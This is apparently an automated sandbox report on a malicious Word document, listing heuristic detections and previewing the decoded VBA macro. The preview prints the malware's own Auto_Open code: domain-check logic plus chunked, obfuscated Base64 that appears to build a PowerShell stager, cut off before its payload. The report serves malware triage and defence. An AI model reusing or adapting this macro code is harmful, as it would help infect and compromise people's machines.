MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros with an Auto_Open subroutine, which is a common technique for executing malicious code upon document opening. The critical heuristic firing for Shell() call in VBA indicates the macro attempts to execute external commands. The script also uses GetObject to interact with WMI, potentially to check network connectivity or gather system information before proceeding with payload execution.
Heuristics 8
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://help.github.com/articles/github-terms-of-service/ In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 127107 bytes |
SHA-256: aab0e3213b97ab9a1d77284e8451846794b6086bef88f44291a8157c6b9d47ad |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
On Error Resume Next
Set objPing = GetObject("winmgmts:").Get("Win32_PingStatus.Address='location.microsoft.com',ResolveAddressNames=True")
With objPing
Debug.Print "Status Code: " & .StatusCode
If .StatusCode = 0 Then
nt1 = False
ElseIf .StatusCode > 0 Then
nt1 = False
Else 'No DNS Resolution
nt1 = True
End If
End With
Set objPing = GetObject("winmgmts:").Get("Win32_PingStatus.Address='" & Environ$("userdomain") & "',ResolveAddressNames=True")
With objPing
Debug.Print "Status Code: " & .StatusCode
Debug.Print "Address: " & .Address
If .StatusCode = 0 Then
nt2 = True
ElseIf .StatusCode > 0 Then
nt2 = False
Else 'No DNS Resolution
nt2 = False
End If
End With
If nt1 = True And nt2 = True Then
Dim UnstorableNonglazed As String
PettlingUrnflower = Array("u", "c", "b", "w", "d", "x", "h", "o", "-", "a", "p", "n", " ", "i", "l", "t", "s", "r", "y", "e")
Dim ReconfirmDiplasion As String
ReconfirmDiplasion = "SQBmACgAJABQ"
Dim ApplianceAxles As String
ApplianceAxles = "AFMAVgBlAHIAcwBJAE8A"
Dim SiphonocladalesFinches As String
SiphonocladalesFinches = "bgBUAGEAYgBMAGUALgBQA"
Dim UnformulisticGalantine As String
UnformulisticGalantine = "FMAVgBlAFI"
Dim HeliophobiaPullalue As String
HeliophobiaPullalue = "AUwBpAE8AT"
StunsHypercorrectness = StunsHypercorrectness & ReconfirmDiplasion & ApplianceAxles & SiphonocladalesFinches & UnformulisticGalantine & HeliophobiaPullalue
Dim CatapanOophytic As String
CatapanOophytic = "gAuAE0AQQBKAE"
Dim ShoplandIncendious As String
ShoplandIncendious = "8AUgAgAC"
Dim ErdCrofterization As String
ErdCrofterization = "0ARwBFACAAMwApA"
Dim SuperabstractlyVolpane As String
SuperabstractlyVolpane = "HsAJABHAFAARg"
Dim RulinglyDeputator As String
RulinglyDeputator = "A9AFsAcgBlAGY"
StunsHypercorrectness = StunsHypercorrectness & CatapanOophytic & ShoplandIncendious & ErdCrofterization & SuperabstractlyVolpane & RulinglyDeputator
Dim TwiselBenamed As String
TwiselBenamed = "AXQAuAEEAUwBzAGUAT"
UnstorableNonglazed = UnstorableNonglazed + PettlingUrnflower(10)
UnstorableNonglazed = UnstorableNonglazed + PettlingUrnflower(7)
Dim RoughshodAdrip As String
RoughshodAdrip = "QBiAEwAWQAu"
Dim AlgeticWoodenly As String
AlgeticWoodenly = "AEcARQB0AFQ"
Dim CongealsGlistened As String
CongealsGlistened = "AeQBQAE"
Dim GastrologistGerfen As String
GastrologistGerfen = "UAKAAnAFMA"
StunsHypercorrectness = StunsHypercorrectness & TwiselBenamed & RoughshodAdrip & AlgeticWoodenly & CongealsGlistened & GastrologistGerfen
Dim UnfurredFrankfort As String
UnfurredFrankfort = "eQBzAHQAZQBtAC"
Dim RetortureCorpselikeness As String
RetortureCorpselikeness = "4ATQBhAG4"
Dim SublistsAdvocatrice As String
SublistsAdvocatrice = "AYQBnAGUA"
Dim SplitRestabbing As String
SplitRestabbing = "bQBlAG4AdAAuAEE"
Dim UnkamedReferee As String
UnkamedReferee = "AdQB0AG8AbQBhAHQA"
StunsHypercorrectness = StunsHypercorrectness & UnfurredFrankfort & RetortureCorpselikeness & SublistsAdvocatrice & SplitRestabbing & UnkamedReferee
Dim ContinuersAurothiosulphate As String
Conti
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.